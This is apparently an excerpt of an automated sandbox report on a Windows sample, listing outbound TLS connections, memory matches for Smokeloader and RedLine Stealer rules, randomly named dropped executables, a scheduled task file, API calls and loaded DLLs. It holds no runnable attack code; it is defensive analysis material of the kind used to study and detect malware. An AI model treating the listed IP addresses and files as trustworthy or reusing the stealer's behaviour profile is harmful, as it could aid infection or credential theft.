                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52989
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55639 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55575
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52500
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55568 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55582
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55583
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55413 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55584
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51394 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55580
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55581
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownHTTPS traffic detected: 140.82.112.4:443 -> 192.168.2.5:49708 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.100.78.158:443 -> 192.168.2.5:51394 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.100.78.158:443 -> 192.168.2.5:51964 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:53550 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.54.158:443 -> 192.168.2.5:55130 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.20.68.143:443 -> 192.168.2.5:55554 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.169.89:443 -> 192.168.2.5:55562 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:55560 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.200.219:443 -> 192.168.2.5:55569 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.200.219:443 -> 192.168.2.5:55570 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.178.183:443 -> 192.168.2.5:55573 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.178.183:443 -> 192.168.2.5:55574 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:55568 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.188.178:443 -> 192.168.2.5:55575 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.142:443 -> 192.168.2.5:55572 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.142:443 -> 192.168.2.5:55571 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.167.110.211:443 -> 192.168.2.5:55580 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.167.110.211:443 -> 192.168.2.5:55581 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.177.133:443 -> 192.168.2.5:55584 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.177.133:443 -> 192.168.2.5:55583 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 52.217.234.57:443 -> 192.168.2.5:55582 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.63.71:443 -> 192.168.2.5:55587 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.63.71:443 -> 192.168.2.5:55586 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.168.159:443 -> 192.168.2.5:55617 version: TLS 1.2
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe Code function: 13_2_0040710B GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040710B

                  E-Banking Fraud


                  System Summary

                  Source: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                  Source: 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                  Source: 00000005.00000002.4581208018.000000000A499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
                  Source: 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                  Source: 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                  Source: 00000005.00000002.4581208018.000000000A6D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
                  Source: 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                  Source: 00000024.00000002.3385094968.0000000001171000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                  Source: 0000001E.00000002.3216770112.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                  Source: 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                  Source: 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                  Source: 00000021.00000002.3266926233.000000000111E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                  Source: 00000020.00000002.3381975417.0000000000FDD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                  Source: 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                  Source: 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                  Source: 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                  Source: 0000000F.00000002.2758267027.0000000000942000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                  Source: 0000001E.00000002.3187121792.0000000001021000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                  Source: 00000020.00000002.3398211956.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000024.00000002.3409633902.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000021.00000002.3298037878.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000019.00000002.3250452098.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 EntryPoint,SetErrorMode,GetVersion,lstrlenA,InitCommonControls,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,DeleteFileA,DeleteFileA,GetWindowsDirectoryA,DeleteFileA,DeleteFileA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,DeleteFileA,DeleteFileA,OleUninitialize,GetCurrentProcess,ExitWindowsEx,ExitProcess,13_2_00404375
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeCode function: 14_2_00404375 EntryPoint,SetErrorMode,GetVersion,lstrlenA,InitCommonControls,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,DeleteFileA,DeleteFileA,GetWindowsDirectoryA,DeleteFileA,DeleteFileA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,DeleteFileA,DeleteFileA,OleUninitialize,GetCurrentProcess,ExitWindowsEx,ExitProcess,14_2_00404375
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeFile created: C:\Windows\Tasks\88e931437f4fbe2c.job
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00405DF012_2_00405DF0
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00402D9012_2_00402D90
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004096C212_2_004096C2
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004046A112_2_004046A1
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004057D212_2_004057D2
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: String function: 00405D94 appears 38 times
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: String function: 004043B0 appears 316 times
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3876 -s 134468
                  Source: dl7WL77rkA.exeStatic PE information: invalid certificate
                  Source: MK1r6sTJJ0KuvAGWdjimbW8H.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: IiRP3mWif0xpaQsabblBwYAE.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: PM6qM9TthMxsL1RAWEhuUNLx.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: pdCLEldSyO5Ik39YE4kJVbXN.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: XbJnQ7YPZT43Q5vvoXLuAoSq.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: Jye7PnMsJdWwQaaabqxbHITx.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: YHw4f8SZUCkdAWRXPfF1qOas.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: IpW6W2Yjx6z6D3j66j3N2tH5.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: 4xb6JU3I8UdzuT7ogqFnBL7Y.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: H7TIhgIvG1Yhal1QnwrEdA0q.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: LP2uR8v5nKtflOO7HsEX74Am.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: SNePs0JIjHDOAKzI11CQ043K.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: YfSmDepXBWKsGmamEEWNYwB5.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: pxzTG78L668f3mDyeDkHXryr.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: BroomSetup.exe.13.drStatic PE information: Resource name: RT_CURSOR type: DOS executable (COM)
                  Source: BroomSetup.exe.13.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                  Source: syncUpd.exe.13.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: dl7WL77rkA.exeStatic PE information: No import functions for PE file found
                  Source: dl7WL77rkA.exe, 00000000.00000000.2001044658.000001EBAAA22000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAssalamAlaikum.exe> vs dl7WL77rkA.exe
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: version.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: riched20.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: usp10.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: msls31.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: rasman.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: secur32.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: schannel.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: webio.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: edputil.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: slc.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: sppc.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: propsys.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: edputil.dll
